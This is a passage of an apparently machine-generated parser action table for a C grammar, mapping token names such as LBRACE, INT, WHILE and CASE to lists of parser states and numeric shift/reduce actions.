140,33,-141,-145,-76,-79,-82,-75,-77,33,-81,-215,-214,-80,-216,-78,-127,33,-153,33,-151,-148,-157,-168,-69,-36,-35,33,347,33,33,-234,-233,33,-231,-217,-230,-81,-84,-218,-152,-150,77,-158,-170,-169,-31,-34,33,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LBRACE':([21,24,28,31,32,42,48,61,75,86,88,90,92,93,96,97,98,100,101,119,124,130,131,181,182,191,200,201,227,229,284,285,286,289,291,298,300,301,302,303,305,307,308,332,340,341,369,375,377,413,424,425,428,429,432,435,437,438,439,440,453,454,472,475,477,478,479,488,496,497,500,502,505,506,510,511,512,521,522,535,536,537,539,550,554,555,557,558,569,574,575,576,577,578,579,],[-337,-154,-155,97,97,-29,-52,-71,-337,-53,-7,-88,97,-8,97,-335,97,97,97,-87,-72,97,97,97,-89,-336,-30,97,-337,97,-76,-79,-82,-75,-77,97,-81,-215,-214,-80,-216,97,-78,-69,-36,-35,-12,97,-11,97,-234,-233,-231,97,-217,-230,97,-84,-218,97,-31,-34,-337,-198,97,97,97,-337,-229,-232,-221,97,-83,-219,-68,-33,-32,97,-11,97,-220,97,97,-337,-225,-224,-222,-84,97,97,-226,-223,97,-228,-227,]),'PPHASH':([0,14,16,17,19,25,38,45,47,59,61,119,123,124,180,191,223,332,439,510,],[47,-64,-60,-67,-66,-65,-63,-62,-70,47,-71,-87,-61,-72,-73,-336,-74,-69,-218,-68,]),'INT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[56,-337,-113,-128,56,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,56,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,56,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,56,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,56,-131,-95,-101,-97,56,-53,-126,56,-88,56,56,-93,56,-147,-335,-146,56,-167,-166,-182,-100,-126,56,-87,-90,-94,-92,-61,-72,56,-144,-142,56,56,56,-73,56,-89,56,56,56,-149,-159,-160,-156,-336,56,-183,-30,56,56,-74,56,56,56,56,-174,-175,56,-143,-140,56,-141,-145,-76,-79,-82,-75,-77,56,-81,-215,-214,-80,-216,-78,-127,56,-153,56,-151,-148,-157,-168,-69,-36,-35,56,56,56,-234,-233,56,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,56,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'SIGNED':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[54,-337,-113,-128,54,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,54,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,54,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,54,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,54,-131,-95,-101,-97,54,-53,-126,54,-88,54,54,-93,54,-147,-335,-146,54,-167,-166,-182,-100,-126,54,-87,-90,-94,-92,-61,-72,54,-144,-142,54,54,54,-73,54,-89,54,54,54,-149,-159,-160,-156,-336,54,-183,-30,54,54,-74,54,54,54,54,-174,-175,54,-143,-140,54,-141,-145,-76,-79,-82,-75,-77,54,-81,-215,-214,-80,-216,-78,-127,54,-153,54,-151,-148,-157,-168,-69,-36,-35,54,54,54,-234,-233,54,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,54,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'CONTINUE':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,293,-336,-76,-79,-82,-75,-77,293,-81,-215,-214,-80,-216,293,-78,-69,-234,-233,-231,293,-217,-230,293,-84,-218,293,-229,-232,-221,293,-83,-219,-68,293,-220,293,293,-225,-224,-222,-84,293,293,-226,-223,293,-228,-227,]),'NOT':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,151,-335,-28,-182,-27,151,-337,-87,-72,-337,151,-286,-285,151,151,-283,-287,-288,151,-284,151,151,151,-336,-183,151,151,-28,-337,151,-28,-337,-337,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,-337,-76,-79,-82,-75,151,-77,151,151,-81,-215,-214,-80,-216,151,-78,151,151,-69,-284,151,151,-284,151,151,-244,-247,-245,-241,-242,-246,-248,151,-250,-251,-243,-249,-12,151,151,-11,151,151,151,151,-234,-233,151,-231,151,151,-217,151,-230,151,-84,-218,151,151,151,-337,-337,-198,151,151,151,-337,-284,-229,-232,151,-221,151,-83,-219,-68,151,-28,-337,151,-11,151,151,-220,151,151,151,-284,151,151,151,-337,151,-225,-224,-222,-84,151,151,151,-226,-223,151,-228,-227,]),'OREQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,366,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'MOD':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,260,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,260,260,260,260,260,260,260,260,260,260,-257,-256,260,260,260,260,260,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'RSHIFT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,242,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,242,-262,-260,242,242,242,-259,242,242,-257,-256,242,242,242,242,242,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'DEFAULT':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,295,-336,-76,-79,-82,-75,-77,295,-81,-215,-214,-80,-216,295,-78,-69,-234,-233,-231,295,-217,-230,295,-84,-218,295,-229,-232,-221,295,-83,-219,-68,295,-220,295,295,-225,-224,-222,-84,295,295,-226,-223,295,-228,-227,]),'_NORETURN':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[20,20,-113,-128,20,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,20,-120,-115,-65,-102,20,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,20,20,-119,20,-114,-130,20,-118,-71,-103,20,-131,-96,-98,20,-131,-95,-101,-97,-53,20,20,-88,20,-147,-335,-146,-167,-166,-100,-126,20,-87,-61,-72,20,-73,20,-89,-149,-336,-30,20,-74,-174,-175,20,-76,-79,-82,-75,-77,20,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,20,20,20,-234,-233,20,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,20,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'__INT128':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[43,-337,-113,-128,43,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,43,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,43,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,43,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,43,-131,-95,-101,-97,43,-53,-126,43,-88,43,43,-93,43,-147,-335,-146,43,-167,-166,-182,-100,-126,43,-87,-90,-94,-92,-61,-72,43,-144,-142,43,43,43,-73,43,-89,43,43,43,-149,-159,-160,-156,-336,43,-183,-30,43,43,-74,43,43,43,43,-174,-175,43,-143,-140,43,-141,-145,-76,-79,-82,-75,-77,43,-81,-215,-214,-80,-216,-78,-127,43,-153,43,-151,-148,-157,-168,-69,-36,-35,43,43,43,-234,-233,43,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,43,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'WHILE':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,436,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,296,-336,-76,-79,-82,-75,-77,296,-81,-215,-214,-80,-216,296,-78,-69,-234,-233,-231,296,-217,-230,504,296,-84,-218,296,-229,-232,-221,296,-83,-219,-68,296,-220,296,296,-225,-224,-222,-84,296,296,-226,-223,296,-228,-227,]),'U8CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,154,-335,-28,-182,-27,154,-337,-87,-72,-337,154,-286,-285,154,154,-283,-287,-288,154,-284,154,154,154,-336,-183,154,154,-28,-337,154,-28,-337,-337,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,-337,-76,-79,-82,-75,154,-77,154,154,-81,-215,-214,-80,-216,154,-78,154,154,-69,-284,154,154,-284,154,154,-244,-247,-245,-241,-242,-246,-248,154,-250,-251,-243,-249,-12,154,154,-11,154,154,154,154,-234,-233,154,-231,154,154,-217,154,-230,154,-84,-218,154,154,154,-337,-337,-198,154,154,154,-337,-284,-229,-232,154,-221,154,-83,-219,-68,154,-28,-337,154,-11,154,154,-220,154,154,154,-284,154,154,154,-337,154,-225,-224,-222,-84,154,154,154,-226,-223,154,-228,-227,]),'_ALIGNOF':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,155,-335,-28,-182,-27,155,-337,-87,-72,-337,155,-286,-285,155,155,-283,-287,-288,155,-284,155,155,155,-336,-183,155,155,-28,-337,155,-28,-337,-337,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,-337,-76,-79,-82,-75,155,-77,155,155,-81,-215,-214,-80,-216,155,-78,155,155,-69,-284,155,155,-284,155,155,-244,-247,-245,-241,-242,-246,-248,155,-250,-251,-243,-249,-12,155,155,-11,155,155,155,155,-234,-233,155,-231,155,155,-217,155,-230,155,-84,-218,155,155,155,-337,-337,-198,155,155,155,-337,-284,-229,-232,155,-221,155,-83,-219,-68,155,-28,-337,155,-11,155,155,-220,155,155,155,-284,155,155,155,-337,155,-225,-224,-222,-84,155,155,155,-226,-223,155,-228,-227,]),'EXTERN':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[13,13,-113,-128,13,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,13,-120,-115,-65,-102,13,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,13,13,-119,13,-114,-130,13,-118,-71,-103,13,-131,-96,-98,13,-131,-95,-101,-97,-53,13,13,-88,13,-147,-335,-146,-167,-166,-100,-126,13,-87,-61,-72,13,-73,13,-89,-149,-336,-30,13,-74,-174,-175,13,-76,-79,-82,-75,-77,13,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,13,13,13,-234,-233,13,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,13,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'CASE':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,297,-336,-76,-79,-82,-75,-77,297,-81,-215,-214,-80,-216,297,-78,-69,-234,-233,-231,297,-217,-230,297,-84,-218,297,-229,-232,-221,297,-83,-219,-68,297,-220,297,297,-225,-224,-222,-84,297,297,-226,-223,297,-228,-227,]),'LAND':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,255,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,255,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'REGISTER':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[62,62,-113,-128,62,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,62,-120,-115,-65,-102,62,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,62,62,-119,62,-114,-130,62,-118,-71,-103,62,-131,-96,-98,62,-131,-95,-101,-97,-53,62,62,-88,62,-147,-335,-146,-167,-166,-100,-126,62,-87,-61,-72,62,-73,62,-89,-149,-336,-30,62,-74,-174,-175,62,-76,-79,-82,-75,-77,62,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,62,62,62,-234,-233,62,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,62,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'MODEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,359,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'NE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,247,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,247,-262,-260,-264,-268,-263,-259,-266,247,-257,-256,-265,247,-267,247,247,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'SWITCH':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,299,-336,-76,-79,-82,-75,-77,299,-81,-215,-214,-80,-216,299,-78,-69,-234,-233,-231,299,-217,-230,299,-84,-218,299,-229,-232,-221,299,-83,-219,-68,299,-220,299,299,-225,-224,-222,-84,299,299,-226,-223,299,-228,-227,]),'INT_CONST_HEX':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,160,-335,-28,-182,-27,160,-337,-87,-72,-337,160,-286,-285,160,160,-283,-287,-288,160,-284,160,160,160,-336,-183,160,160,-28,-337,160,-28,-337,-337,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,-337,-76,-79,-82,-75,160,-77,160,160,-81,-215,-214,-80,-216,160,-78,160,160,-69,-284,160,160,-284,160,160,-244,-247,-245,-241,-242,-246,-248,160,-250,-251,-243,-249,-12,160,160,-11,160,160,160,160,-234,-233,160,-231,160,160,-217,160,-230,160,-84,-218,160,160,160,-337,-337,-198,160,160,160,-337,-284,-229,-232,160,-221,160,-83,-219,-68,160,-28,-337,160,-11,160,160,-220,160,160,160,-284,160,160,160,-337,160,-225,-224,-222,-84,160,160,160,-226,-223,160,-228,-227,]),'_COMPLEX':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[60,-337,-113,-128,60,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,60,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,60,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,60,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,60,-131,-95,-101,-97,60,-53,-126,60,-88,60,60,-93,60,-147,-335,-146,60,-167,-166,-182,-100,-126,60,-87,-90,-94,-92,-61,-72,60,-144,-142,60,60,60,-73,60,-89,60,60,60,-149,-159,-160,-156,-336,60,-183,-30,60,60,-74,60,60,60,60,-174,-175,60,-143,-140,60,-141,-145,-76,-79,-82,-75,-77,60,-81,-215,-214,-80,-216,-78,-127,60,-153,60,-151,-148,-157,-168,-69,-36,-35,60,60,60,-234,-233,60,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,60,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PPPRAGMASTR':([61,],[124,]),'PLUSEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,362,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'U32CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,138,-335,-28,-182,-27,138,-337,-87,-72,-337,138,-286,-285,138,138,-283,-287,-288,138,-284,138,138,138,-336,-183,138,138,-28,-337,138,-28,-337,-337,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,138,-337,-76,-79,-82,-75,138,-77,138,138,-81,-215,-214,-80,-216,138,-78,138,138,-69,-284,138,138,-284,138,138,-244,-247,-245,-241,-242,-246,-248,138,-250,-251,-243,-249,-12,138,138,-11,138,138,138,138,-234,-233,138,-231,138,138,-217,138,-230,138,-84,-218,138,138,138,-337,-337,-198,138,138,138,-337,-284,-229,-232,138,-221,138,-83,-219,-68,138,-28,-337,138,-11,138,138,-220,138,138,138,-284,138,138,138,-337,138,-225,-224,-222,-84,138,138,138,-226,-223,138,-228,-227,]),'CONDOP':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,258,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'U8STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,163,-335,-28,-182,-27,163,-337,-87,-72,-337,163,-286,-285,-330,163,-327,163,-283,-287,236,-328,-288,-329,163,-284,163,163,163,-336,-183,163,163,-28,-337,163,-28,-337,-337,163,163,163,-334,-332,-331,-333,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,163,-337,-76,-79,-82,-75,163,-77,163,163,-81,-215,-214,-80,-216,163,-78,163,163,-69,-284,163,163,-284,163,163,-244,-247,-245,-241,-242,-246,-248,163,-250,-251,-243,-249,-12,163,163,-11,163,163,163,163,-234,-233,163,-231,163,163,-217,163,-230,163,-84,-218,163,163,163,-337,-337,-198,163,163,163,-337,-284,-229,-232,163,-221,163,-83,-219,-68,